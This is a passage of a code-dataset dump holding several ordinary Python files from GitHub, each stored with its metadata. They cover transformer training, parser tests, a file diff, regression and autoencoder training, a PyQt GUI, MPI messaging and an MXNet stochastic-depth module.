size, 1, 1, src len]\n #trg_mask = [batch size, 1, trg len, trg len]\n \n enc_src = self.encoder(src, src_mask)\n \n #enc_src = [batch size, src len, hid dim]\n \n output, attention = self.decoder(trg, enc_src, trg_mask, src_mask)\n \n #output = [batch size, trg len, output dim]\n #attention = [batch size, n heads, trg len, src len]\n \n return output, attention\n\nINPUT_DIM = len(field.vocab)\nOUTPUT_DIM = len(field.vocab)\nHID_DIM = 256\nENC_LAYERS = 3\nDEC_LAYERS = 3\nENC_HEADS = 8\nDEC_HEADS = 8\nENC_PF_DIM = 512\nDEC_PF_DIM = 512\nENC_DROPOUT = 0.1\nDEC_DROPOUT = 0.1\n\nenc = Encoder(INPUT_DIM, \n HID_DIM, \n ENC_LAYERS, \n ENC_HEADS, \n ENC_PF_DIM, \n ENC_DROPOUT, \n device)\n\ndec = Decoder(OUTPUT_DIM, \n HID_DIM, \n DEC_LAYERS, \n DEC_HEADS, \n DEC_PF_DIM, \n DEC_DROPOUT, \n device)\n\nSRC_PAD_IDX = field.vocab.stoi[field.pad_token]\nTRG_PAD_IDX = field.vocab.stoi[field.pad_token]\n\nmodel = Seq2Seq(enc, dec, SRC_PAD_IDX, TRG_PAD_IDX, device).to(device)\n# model.load_state_dict(torch.load('/content/drive/My Drive/paraphraser 2.0/train/model.pt'))\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\nprint(f'The model has {count_parameters(model):,} trainable parameters')\n\ndef initialize_weights(m):\n if hasattr(m, 'weight') and m.weight.dim() > 1:\n nn.init.xavier_uniform_(m.weight.data)\n\nmodel.apply(initialize_weights);\n\nLEARNING_RATE = 0.0005\n\noptimizer = torch.optim.Adam(model.parameters(), lr = LEARNING_RATE)\n\ncriterion = nn.CrossEntropyLoss(ignore_index = TRG_PAD_IDX)\n\ndef train(model, iterator, optimizer, criterion, clip):\n \n model.train()\n \n epoch_loss = 0\n \n for i, batch in enumerate(iterator):\n \n src = batch.original\n trg = batch.paraphrase\n \n optimizer.zero_grad()\n \n output, _ = model(src, trg[:,:-1])\n \n #output = [batch size, trg len - 1, output dim]\n #trg = [batch size, trg len]\n \n output_dim = output.shape[-1]\n \n output = output.contiguous().view(-1, output_dim)\n trg = trg[:,1:].contiguous().view(-1)\n \n #output = [batch size * trg len - 1, output dim]\n #trg = [batch size * trg len - 1]\n \n loss = criterion(output, trg)\n \n loss.backward()\n \n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n \n optimizer.step()\n \n epoch_loss += loss.item()\n \n return epoch_loss / len(iterator)\n\ndef evaluate(model, iterator, criterion):\n \n model.eval()\n \n epoch_loss = 0\n \n with torch.no_grad():\n \n for i, batch in enumerate(iterator):\n\n src = batch.original\n trg = batch.paraphrase\n\n output, _ = model(src, trg[:,:-1])\n \n #output = [batch size, trg len - 1, output dim]\n #trg = [batch size, trg len]\n \n output_dim = output.shape[-1]\n \n output = output.contiguous().view(-1, output_dim)\n trg = trg[:,1:].contiguous().view(-1)\n \n #output = [batch size * trg len - 1, output dim]\n #trg = [batch size * trg len - 1]\n \n loss = criterion(output, trg)\n\n epoch_loss += loss.item()\n \n return epoch_loss / len(iterator)\n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\nCLIP = 1\n\ntrain_losses_hist = [] \nval_losses_hist = []\n\nbest_valid_loss = 99999\n\nepoch = 1\nwhile True:\n\n start_time = time.time()\n \n train_loss = train(model, train_iterator, optimizer, criterion, CLIP)\n train_losses_hist.append(train_loss)\n\n valid_loss = evaluate(model, test_iterator, criterion)\n val_losses_hist.append(valid_loss)\n\n end_time = time.time()\n \n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(),\n 'model.pt')\n\n print(f'Epoch: {epoch+1:02} | Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. PPL: {math.exp(valid_loss):7.3f}')\n\n epoch += 1\n\n\ndef translate_sentence(sentence, field, model, device, max_len = 50):\n \n model.eval()\n \n tokens = field.preprocess(sentence)\n\n tokens = [field.init_token] + tokens + [field.eos_token]\n \n src_indexes = [field.vocab.stoi[token] for token in tokens]\n\n src_tensor = torch.LongTensor(src_indexes).unsqueeze(0).to(device)\n \n src_mask = model.make_src_mask(src_tensor)\n \n with torch.no_grad():\n enc_src = model.encoder(src_tensor, src_mask)\n\n trg_indexes = [field.vocab.stoi[field.init_token]]\n\n for i in range(max_len):\n\n trg_tensor = torch.LongTensor(trg_indexes).unsqueeze(0).to(device)\n\n trg_mask = model.make_trg_mask(trg_tensor)\n \n with torch.no_grad():\n output, attention = model.decoder(trg_tensor, enc_src, trg_mask, src_mask)\n \n pred_token = output.argmax(2)[:,-1].item()\n \n trg_indexes.append(pred_token)\n\n if pred_token == field.vocab.stoi[field.eos_token]:\n break\n \n trg_tokens = [field.vocab.itos[i] for i in trg_indexes]\n \n return trg_tokens[1:], attention\n\n\ninfer_df = []\n\nexample_idx = 600\n\nsrc = vars(test_data.examples[example_idx])['original']\ntrg = vars(test_data.examples[example_idx])['paraphrase']\n\ntranslation, attention = translate_sentence(src, field, model, device)\ntranslation = translation[:-1]\n\ntranslation, attention = translate_sentence(src, field, model, device)\nbpe2sent = lambda x: ' '.join(''.join(x).split('▁'))\n\n# print(f'{bpe2sent(src)}')\n# print(f'{bpe2sent(trg)}')\n# print('\\n')\n# print(f'{bpe2sent(translation)}')\n\n# bpe2sent(translation)","repo_name":"merionum/neural-paraphrase-generation","sub_path":"train_universal_transformer.py","file_name":"train_universal_transformer.py","file_ext":"py","file_size_in_byte":19080,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74155515626","text":"import re\n\nfrom helpers import setup_path\n\nsetup_path()\n\nimport logging\nfrom logr import Logr\nLogr.configure(logging.DEBUG)\n\nfrom caper import Caper, Matcher\nfrom caper.parsers.base import Parser\nfrom caper.group import CaptureGroup\nfrom caper.objects import CaperClosure\nfrom caper.result import CaperResult\nfrom matchers import has_info\nfrom helpers import assert_result\nfrom hamcrest import *\nimport pytest\n\ncaper = Caper()\n\n\nclass DummyParser(Parser):\n def __init__(self, pattern_groups, debug=False):\n super(DummyParser, self).__init__(Matcher(pattern_groups), debug)\n\n\ndef build_parser(name='Show.Name.S01E03-GROUP'):\n parser = DummyParser([\n ('identifier', [\n (1.0, [\n r'^S(?P\\d+)E(?P\\d+)$',\n ])\n ])\n ])\n\n # Parse test name into closures\n closures = caper._closure_split(name)\n closures = caper._fragment_split(closures)\n parser.setup(closures)\n\n return parser\n\n\ndef test_fragment_constraint():\n parser = build_parser()\n\n # Capture show name until we hit the identifier\n group = CaptureGroup(parser, parser.result)\\\n .capture_fragment('show_name', single=False)\\\n .until_fragment(node__re='identifier')\n\n # TODO test CaptureStep.__repr__ properly\n repr(group.steps)\n\n group.execute()\n\n # Build the result from tree\n parser.result.build()\n\n # Ensure result is valid\n assert_result(parser.result, (1.0, {\n 'show_name': ['Show', 'Name']\n }))\n\n\ndef test_pattern_constraint():\n parser = build_parser()\n\n # Capture show name until we hit the identifier\n CaptureGroup(parser, parser.result) \\\n .capture_fragment('show_name', single=False) \\\n .until_fragment(right_sep__re=re.compile('^-$')) \\\n .execute()\n\n # Build the result from tree\n parser.result.build()\n\n # Ensure result is valid\n assert_result(parser.result, (1.0, {\n 'show_name': ['Show', 'Name']\n }))\n\n\ndef test_value_constraint():\n parser = build_parser()\n\n # Capture show name until we hit the identifier\n CaptureGroup(parser, parser.result) \\\n .capture_fragment('show_name', single=False) \\\n .until_fragment(value__re='identifier') \\\n .execute()\n\n # Build the result from tree\n parser.result.build()\n\n # Ensure result is valid\n assert_result(parser.result, (1.0, {\n 'show_name': ['Show', 'Name']\n }))\n\n\ndef test_invalid_attribute():\n parser = build_parser()\n\n # Capture show name until we hit the identifier\n with pytest.raises(ValueError) as exc:\n CaptureGroup(parser, parser.result) \\\n .capture_fragment('show_name', single=False) \\\n .until_fragment(blah__re='identifier') \\\n .execute()\n\n assert_that(\n str(exc.value),\n equal_to(\"Unknown constraint match type 'blah'\")\n )\n","repo_name":"fuzeman/Caper","sub_path":"tests/test_constraints.py","file_name":"test_constraints.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"71695177067","text":"#tech_lab1\r\n\r\n\r\nfile1 = open('','r')\r\nfile2 = open('','r')\r\n\r\n\r\nlines1 = []\r\nlines2 = []\r\n\r\n\r\nfor line in file1:\r\n lines1.append(line)\r\n\r\nfor line in file2:\r\n lines2.append(line)\r\n\r\nprint(\"flie1:\")\r\nfor element in lines1:\r\n if not element in lines2:\r\n print (element, end=\"\")\r\n\r\nprint(\"\\n\\nfile2:\")\r\nfor element in lines2:\r\n if not element in lines1:\r\n print(element, end=\"\")\r\n \r\nfile1.close()\r\nfile2.close()\r\n","repo_name":"zhanchi5/tech_lab1","sub_path":"tech_lab1.py","file_name":"tech_lab1.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10261264127","text":"from sklearn import metrics\nfrom sklearn.metrics import r2_score\nfrom MS1 import TestScript\nimport pickle\nimport pandas as pd\nimport os\ndef test1(filepath):\n df = pd.read_csv(filepath)\n #df = df.head(1000)\n df = TestScript.TestScript(df, \"MS1/\").clean()\n X = df.drop(columns=['Reviewer_Score'])\n y = df['Reviewer_Score']\n\n linearRegression = pickle.load(open(\"MS1/Linear_Regression.sav\", 'rb'))\n polynomialRegression = pickle.load(open(\"MS1/polynomial_regression.sav\", 'rb'))\n poly_features = pickle.load(open(\"MS1/polynomial_features.sav\", 'rb'))\n randomForest = pickle.load(open(\"MS1/random_forest.sav\", 'rb'))\n ridgeRegression = pickle.load(open(\"MS1/Ridge_Regression.sav\", 'rb'))\n\n linear_pred = linearRegression.predict(X)\n print('linear Mean Square Error = ', metrics.mean_squared_error(y, linear_pred))\n score = r2_score(y, linear_pred)\n print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n df['Linear_Regression'] = linear_pred\n\n X_poly = poly_features.fit_transform(X)\n poly_pred = polynomialRegression.predict(X_poly)\n print('polynomial regression Mean Square Error = ', metrics.mean_squared_error(y, poly_pred))\n score = r2_score(y, poly_pred)\n print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n df['Polynomial_Regression'] = poly_pred\n\n randomForest_pred = randomForest.predict(X)\n print('random forest Mean Square Error = ', metrics.mean_squared_error(y, randomForest_pred))\n score = r2_score(y, randomForest_pred)\n print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n df['Random_Forest'] = randomForest_pred\n\n ridge_pred = ridgeRegression.predict(X)\n print('ridge regression Mean Square Error = ', metrics.mean_squared_error(y, ridge_pred))\n score = r2_score(y, ridge_pred)\n print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n df['Ridge_Regression'] = ridge_pred\n df.to_csv('test1.csv')\n os.startfile('test1.csv')\n","repo_name":"Yasmine-Khaled/Hotel-Rating-Prediction","sub_path":"Hotel Rating Prediction/Hotel Rating Prediction/Test1.py","file_name":"Test1.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74221274028","text":"import pickle\n# 加载模型\nwith open('svr_model.pkl', 'rb') as model_file:\n loaded_model = pickle.load(model_file)\n\n# 假设你希望进行预测的坡度和实际速度\nslope = 8 # 坡度为十度\nactual_speed = 10 # 实际的速度指令\n\n# 自定义逻辑判断和重新预测的循环\nwhile True:\n # 进行预测\n predicted_output = loaded_model.predict([[slope, actual_speed]])\n\n if slope > 0 and predicted_output < actual_speed:\n # 当坡度为正时,如果预测的速度指���值小于实际速度,将坡度增加1度进行重新预测\n slope += 1\n elif slope < 0 and predicted_output > actual_speed:\n # 当坡度为负时,如果预测的速度指令值大于实际速度,将坡度减小1度进行重新预测\n slope -= 1\n else:\n # 如果满足条件,跳出循环\n break\n\nprint(\"预测的速度指令值(经过逻辑判断后):\", predicted_output[0])\n","repo_name":"sakurashang/steadySpeedControl","sub_path":"predictSpeed/testSVR.py","file_name":"testSVR.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2530422107","text":"\r\nimport sys\r\nimport train\r\nfrom PyQt5 import QtGui\r\nfrom PyQt5.QtCore import QBasicTimer, Qt\r\nfrom PyQt5.QtWidgets import *\r\nfrom settings import setpath,setpath2,setbeta\r\nfrom PyQt5.QtGui import QPixmap\r\n\r\nclass GUI(QWidget):\r\n def __init__(self):\r\n super(GUI, self).__init__()\r\n self.initUI()\r\n def initUI(self):\r\n self.setWindowTitle('Style Transfer Master')\r\n self.setGeometry(300, 300, 1000, 600)\r\n #self.setWindowTitle('')\r\n #self.label2 = QLabel('Let\\'s magic your picture', self)\r\n #self.move(self,200)\r\n #self.pbar = QProgressBar(self)\r\n #self.pbar.setGeometry(130, 20, 300, 25)\r\n #self.timer = QBasicTimer()\r\n #self.step = 0\r\n self.bar = QSlider(Qt.Horizontal, self)\r\n self.bar.setRange(0, 100)\r\n #bar.setGeomerty(100,100,100,100)\r\n self.bar.setGeometry(200*2, 20*2, 100*2, 30*2)\r\n self.bar.valueChanged.connect(self.barfunc)\r\n self.bar.setMinimum(10)\r\n #self.bar.slierReleased.connect(self.barfunc)\r\n #bar.setSliderPosition(100)\r\n #self.bar.move(200.200)\r\n\r\n\r\n\r\n #start button\r\n self.gobuton = QPushButton('Go!', self)\r\n self.gobuton.resize(self.gobuton.sizeHint())\r\n self.gobuton.move(210*2, 250*2)\r\n self.gobuton.clicked.connect(self.go)\r\n #self.gobuton.clicked.connect(self.Action)\r\n self.gobuton.clicked.connect(train.train)\r\n\r\n self.label = QLabel(self)\r\n #self.label.setText(\"显示图片\")\r\n self.label.setFixedSize(220*2, 180*2)\r\n self.label.move(20*2, 50*2)\r\n self.label.setStyleSheet(\"QLabel{background:white;}\"\r\n \"QLabel{color:rgb(300,300,300,120);font-size:10px;font-weight:bold;font-family:宋体;}\"\r\n )\r\n pixmap = QPixmap('cloud.png').scaled(self.label.width(), self.label.height())\r\n #jpg = QtGui.QPixmap(imgName).scaled(self.label2.width(), self.label2.height())\r\n self.label.setPixmap(pixmap)\r\n\r\n\r\n self.label2 = QLabel(self)\r\n # self.label.setText(\"显示图片\")\r\n self.label2.setFixedSize(230*2, 180*2)\r\n self.label2.move(250*2, 50*2)\r\n self.label2.setStyleSheet(\"QLabel{background:white;}\"\r\n \"QLabel{color:rgb(300,300,300,120);font-size:10px;font-weight:bold;font-family:宋体;}\"\r\n )\r\n pixmap = QPixmap('cloud.png').scaled(self.label2.width(), self.label2.height())\r\n # jpg = QtGui.QPixmap(imgName).scaled(self.label2.width(), self.label2.height())\r\n self.label2.setPixmap(pixmap)\r\n\r\n self.openbt =QPushButton('Open',self)\r\n self.openbt.move(100*2,250*2)\r\n self.openbt.clicked.connect(self.openim)\r\n\r\n self.openbt2 = QPushButton('Open', self)\r\n self.openbt2.move(320*2, 250*2)\r\n self.openbt2.clicked.connect(self.openim2)\r\n\r\n\r\n\r\n # self.show()\r\n def say_hi(self):\r\n QMessageBox.information(self,'Hi','Nice to see you.')\r\n sys.exit()\r\n\r\n def openim(self):\r\n imgName, imgType = QFileDialog.getOpenFileName(self, \"Open\", \"\", \"*.jpg;;*.png;;All Files(*)\")\r\n jpg = QtGui.QPixmap(imgName).scaled(self.label.width(), self.label.height())\r\n #print(imgName)\r\n setpath(imgName)\r\n self.label.setPixmap(jpg)\r\n\r\n def go(self):\r\n QMessageBox.information(self,'Please wait a sec','AI painter is working hard!')\r\n\r\n def openim2(self):\r\n imgName, imgType = QFileDialog.getOpenFileName(self, \"Open\", \"\", \"*.jpg;;*.png;;All Files(*)\")\r\n jpg = QtGui.QPixmap(imgName).scaled(self.label2.width(), self.label2.height())\r\n self.label2.setPixmap(jpg)\r\n setpath2(imgName)\r\n def barfunc(self):\r\n v = self.bar.value()\r\n\r\n v = v*50\r\n print(v)\r\n setbeta(v)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n yes = GUI()\r\n yes.show()\r\n sys.exit(app.exec_())","repo_name":"haoranmeng98/ST_master","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39439317619","text":"# import mpi4py\nfrom mpi4py import MPI\n\n# buat COMM\ncomm = MPI.COMM_WORLD\n\n# dapatkan rank proses\nrank = comm.Get_rank()\n\n# dapatkan total proses berjalan\ntotal = comm.Get_size()\n\n# jika saya rank ke 0 maka saya akan mengirimkan pesan ke proses yang mempunyai rank 1 s.d size\nif rank == 0:\n\tpesan = 'pesan'\n\tfor i in range(1,size):\n\t\tcomm.send(data, dest=i, tag=i)\n\t\tprint('Mengirim data : '.format(rank), pesan,' ke ',i)\n\n# jika saya bukan rank 0 maka saya menerima pesan yang berasal dari proses dengan rank 0\nelse:\n\tpesan = comm.recv(source=0, tag=rank)\n\tprint('Menerima pesan : '.format(rank), pesan,' ke ',i)\n","repo_name":"umarfirja16/SisParTer_tugas_MPI","sub_path":"01.mpi_p2p_terkecil.py","file_name":"01.mpi_p2p_terkecil.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38419917815","text":"from sys import argv, stderr\nfrom generator import *\n\n\ndef read_grammar(file_name):\n result = None\n with open(file_name, 'r') as input_file:\n sequences = [s.rstrip() for s in input_file.readlines()]\n if len(sequences) > 1:\n result = sequences\n\n return result\n\n\ndef main():\n sequences = read_grammar(argv[1])\n if sequences:\n AutoGenerateText(sequences).run()\n else:\n print('Invalid input', file=stderr)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mbv/autogen-grammar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33108273498","text":"from constants import *\nfrom utils import *\nfrom train import evaluate\nfrom tqdm import tqdm\n\n\ncnn_result = read_json(\"output/benchmark/attention/neat_cnn_full_15_extracted.json\")\numls_result = read_json(\"output/benchmark/umls_docs_se.json\")\nadr_result = read_json(\"output/benchmark/adr_docs_se.json\")\ntest_id = read_json(\"data/pod/meta_100/train_test.json\")[\"test\"]\ndoc_ses_map = read_json(OUTPUT_DOC_SE_MAP_PATH)\ndoc_drug_map = read_json(OUTPUT_DOC_DRUG_MAP_PATH)\ndrug_se_map = read_json(OUTPUT_DRUG_SE_MAP_PATH)\ndoc_dir = OUTPUT_DOC_DIR\noutput_example_path = \"examples.json\"\n\nexamples = {}\n\nfor doc_id in tqdm(test_id, desc=\"Extracting examples\"):\n if doc_id not in cnn_result or len(cnn_result[doc_id]) == 0:\n continue\n if doc_id not in umls_result or len(umls_result[doc_id]) == 0:\n continue\n if doc_id not in adr_result or len(adr_result[doc_id]) == 0:\n continue\n true_ses = doc_ses_map[doc_id]\n cnn_output = evaluate([true_ses], [cnn_result[doc_id]], num_labels=0, vector=False)\n cnn_precision = cnn_output[\"precision\"]\n umls_output = evaluate([true_ses], [umls_result[doc_id]], num_labels=0, vector=False)\n umls_precision = umls_output[\"precision\"]\n adr_output = evaluate([true_ses], [adr_result[doc_id]], num_labels=0, vector=False)\n adr_precision = adr_output[\"precision\"]\n if cnn_precision > adr_precision > umls_precision:\n doc_path = os.path.join(doc_dir, \"{}.json\".format(doc_id))\n doc_content = read_json(doc_path)\n drugs = doc_drug_map[doc_id]\n drug_se = {drug: drug_se_map[drug] for drug in drugs}\n examples[doc_id] = {\n \"truth\": drug_se,\n \"cnn\": (cnn_result[doc_id], cnn_precision),\n \"umls\": (umls_result[doc_id], umls_precision),\n \"adr\": (adr_result[doc_id], adr_precision),\n \"doc_content\": doc_content\n }\nwrite_json(examples, output_example_path)\n","repo_name":"nguyenvanhoang7398/NEAT","sub_path":"extract_attn.py","file_name":"extract_attn.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72705395947","text":"from agent.agent import Agent as BaseAgent\nfrom numpy.random import rand\nimport numpy as np\n\npred_ret_shape = [(1, 162), (1, 162), (1, 162)]\nlstm_cell_shape = [(1, 16), (1, 16)]\n\n\nclass Agent(BaseAgent):\n \"\"\"\n random agent\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n kwargs[\"rule_only\"] = True\n super().__init__(*args, **kwargs)\n\n def _predict_process(self, features, frame_state, runtime_ids):\n pred_ret = []\n for shape in pred_ret_shape:\n pred_ret.append(rand(*shape).astype(\"float32\"))\n lstm_info = []\n for shape in lstm_cell_shape:\n lstm_info.append(np.zeros(shape).astype(\"float32\"))\n\n return pred_ret, lstm_info\n","repo_name":"tencent-ailab/hok_env","sub_path":"aiarena/3v3/actor/agent/random_agent.py","file_name":"random_agent.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":498,"dataset":"github-code","pt":"37"} +{"seq_id":"16500633136","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the bonAppetit function below.\ndef bonAppetit(bill, k, b):\n result = \"Bon Appetit\"\n\n eaten = bill.copy()\n eaten.remove(eaten[k])\n\n annaSum = sum(eaten) / 2\n billSum = sum(bill) / 2\n\n if (annaSum != b):\n print(int(b-annaSum))\n else:\n print(result)\n\nif __name__ == '__main__':\n nk = input().rstrip().split()\n\n n = int(nk[0])\n\n k = int(nk[1])\n\n bill = list(map(int, input().rstrip().split()))\n\n b = int(input().strip())\n\n bonAppetit(bill, k, b)\n","repo_name":"sebastianczech/HackerRank-Solutions","sub_path":"python/bon-appetit.py","file_name":"bon-appetit.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34693893998","text":"from typing import Dict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ndef data_to_df(results: Dict) -> pd.DataFrame:\n rows = []\n for cpu_load, l_results in results.items():\n for bench_type, bench_results in l_results.items():\n for i, sample in enumerate(bench_results):\n rows.append((bench_type, cpu_load, i, sample))\n\n df = pd.DataFrame(rows, columns=['benchmark', 'cpu_load',\n 'sample_idx', 'rtt'])\n return df.set_index(['benchmark', 'cpu_load', 'sample_idx'])\n\n\ndef plot_results(results: pd.DataFrame) -> None:\n data = results.reset_index()\n\n fig, ax = plt.subplots()\n\n bench_types = ['base', 'proxy', 'tcpdump']\n init_capsize = 5\n markers = ['o', '^', 'v']\n\n sample_sz = 1000\n z = 1.96\n\n cpu_loads = data['cpu_load'].unique()\n\n # add extra legend\n ax.plot([], [], ' ', label='Errorbars indicate 95% confidence interval.')\n\n for i, (btype, mrkr) in enumerate(zip(bench_types, markers)):\n rtt_means = np.empty(len(cpu_loads))\n rtt_stds = np.empty(len(cpu_loads))\n conf_intervals = np.empty(len(cpu_loads))\n for j, load in enumerate(cpu_loads):\n sample = np.random.choice(\n data[(data['benchmark'] == btype) &\n (data['cpu_load'] == load)]['rtt'],\n size=sample_sz, replace=False)\n rtt_means[j] = sample.mean()\n rtt_stds[j] = sample.std()\n conf_intervals[j] = z * (rtt_stds[j] / np.sqrt(sample_sz))\n\n ax.errorbar(\n cpu_loads * 100.0,\n rtt_means,\n yerr=conf_intervals,\n marker=mrkr,\n label=btype.upper(),\n capsize=5 + (i * init_capsize)\n )\n\n ax.set_xlabel('Additional CPU Load [%]')\n ax.set_ylabel('Avg. Total Round-trip Time [ms]')\n # ax.set_ylim([23, 27.5])\n ax.legend()\n\n fig.savefig('results.png')\n plt.show()\n\n\nif __name__ == '__main__':\n data = pd.read_csv('./results.csv')\n data = data.set_index(['benchmark', 'cpu_load', 'sample_idx'])\n plot_results(data)\n","repo_name":"molguin92/ProxyTCPDumpComparison","sub_path":"postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19756466407","text":"import torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom model import Autoencoder\r\nfrom plot import plot_images\r\n\r\nif __name__ == '__main__':\r\n transform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5,), (0.5,))\r\n ])\r\n mnist_data = datasets.MNIST(root=\"./data\",\r\n train=True,\r\n transform=transform)\r\n data_loader = DataLoader(dataset=mnist_data,\r\n batch_size=32,\r\n shuffle=True)\r\n\r\n ## Use the following to check if sigmoid or tanh needed\r\n ## as last activation func in model decoder\r\n # data = iter(data_loader)\r\n # imgs, targets = data.next()\r\n # print(torch.min(imgs))\r\n # print(torch.max(imgs))\r\n\r\n model = Autoencoder()\r\n criterion = nn.MSELoss()\r\n optimizer = optim.SGD(model.parameters(), lr=0.002, momentum=0.9, weight_decay=1e-4)\r\n\r\n NUM_EPOCHS = 10\r\n total_loss = 0\r\n outputs = []\r\n for epoch in range(NUM_EPOCHS):\r\n total_loss = 0\r\n for data, _ in data_loader:\r\n optimizer.zero_grad()\r\n rebuilt_data = model(data)\r\n loss = criterion(rebuilt_data, data)\r\n loss.backward()\r\n optimizer.step()\r\n outputs.append((epoch, data, rebuilt_data))\r\n total_loss += loss.detach().item()\r\n print(f\"Epoch: {epoch + 1} | Loss: {total_loss:.2f}\")\r\n\r\n plot_images(outputs, NUM_EPOCHS)\r\n","repo_name":"VigKu/Simple_Autoencoder_Tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"721432075","text":"import logging\nimport mxnet as mx\nimport numpy as np\n\n\nclass RandomNumberQueue(object):\n def __init__(self, pool_size=1000):\n self._pool = np.random.rand(pool_size)\n self._index = 0\n\n def get_sample(self):\n if self._index >= len(self._pool):\n self._pool = np.random.rand(len(self._pool))\n self._index = 0\n self._index += 1\n return self._pool[self._index-1]\n\n\nclass StochasticDepthModule(mx.module.BaseModule):\n \"\"\"Stochastic depth module is a two branch computation: one is actual computing and the\n other is the skip computing (usually an identity map). This is similar to a Residual block,\n except that a random variable is used to randomly turn off the computing branch, in order\n to save computation during training.\n\n Parameters\n ----------\n symbol_compute: Symbol\n The computation branch.\n symbol_skip: Symbol\n The skip branch. Could be None, in which case an identity map will be automatically\n used. Note the two branch should produce exactly the same output shapes.\n data_names: list of str\n Default is `['data']`. Indicating the input names. Note if `symbol_skip` is not None,\n it should have the same input names as `symbol_compute`.\n label_names: list of str\n Default is None, indicating that this module does not take labels.\n death_rate: float\n Default 0. The probability of turning off the computing branch.\n \"\"\"\n def __init__(self, symbol_compute, symbol_skip=None,\n data_names=('data',), label_names=None,\n logger=logging, context=mx.context.cpu(),\n work_load_list=None, fixed_param_names=None,\n death_rate=0):\n super(StochasticDepthModule, self).__init__(logger=logger)\n\n self._module_compute = mx.module.Module(\n symbol_compute, data_names=data_names,\n label_names=label_names, logger=logger,\n context=context, work_load_list=work_load_list,\n fixed_param_names=fixed_param_names)\n\n if symbol_skip is not None:\n self._module_skip = mx.module.Module(\n symbol_skip, data_names=data_names,\n label_names=label_names, logger=logger,\n context=context, work_load_list=work_load_list,\n fixed_param_names=fixed_param_names)\n else:\n self._module_skip = None\n\n self._open_rate = 1 - death_rate\n self._gate_open = True\n self._outputs = None\n self._input_grads = None\n self._rnd_queue = RandomNumberQueue()\n\n @property\n def data_names(self):\n return self._module_compute.data_names\n\n @property\n def output_names(self):\n return self._module_compute.output_names\n\n @property\n def data_shapes(self):\n return self._module_compute.data_shapes\n\n @property\n def label_shapes(self):\n return self._module_compute.label_shapes\n\n @property\n def output_shapes(self):\n return self._module_compute.output_shapes\n\n def get_params(self):\n params = self._module_compute.get_params()\n if self._module_skip:\n params = [x.copy() for x in params]\n skip_params = self._module_skip.get_params()\n for a, b in zip(params, skip_params):\n # make sure they do not contain duplicated param names\n assert len(set(a.keys()) & set(b.keys())) == 0\n a.update(b)\n return params\n\n def init_params(self, *args, **kwargs):\n self._module_compute.init_params(*args, **kwargs)\n if self._module_skip:\n self._module_skip.init_params(*args, **kwargs)\n\n def bind(self, *args, **kwargs):\n self._module_compute.bind(*args, **kwargs)\n if self._module_skip:\n self._module_skip.bind(*args, **kwargs)\n\n def init_optimizer(self, *args, **kwargs):\n self._module_compute.init_optimizer(*args, **kwargs)\n if self._module_skip:\n self._module_skip.init_optimizer(*args, **kwargs)\n\n def borrow_optimizer(self, shared_module):\n self._module_compute.borrow_optimizer(shared_module._module_compute)\n if self._module_skip:\n self._module_skip.borrow_optimizer(shared_module._module_skip)\n\n def forward(self, data_batch, is_train=None):\n if is_train is None:\n is_train = self._module_compute.for_training\n\n if self._module_skip:\n self._module_skip.forward(data_batch, is_train=True)\n self._outputs = self._module_skip.get_outputs()\n else:\n self._outputs = data_batch.data\n\n if 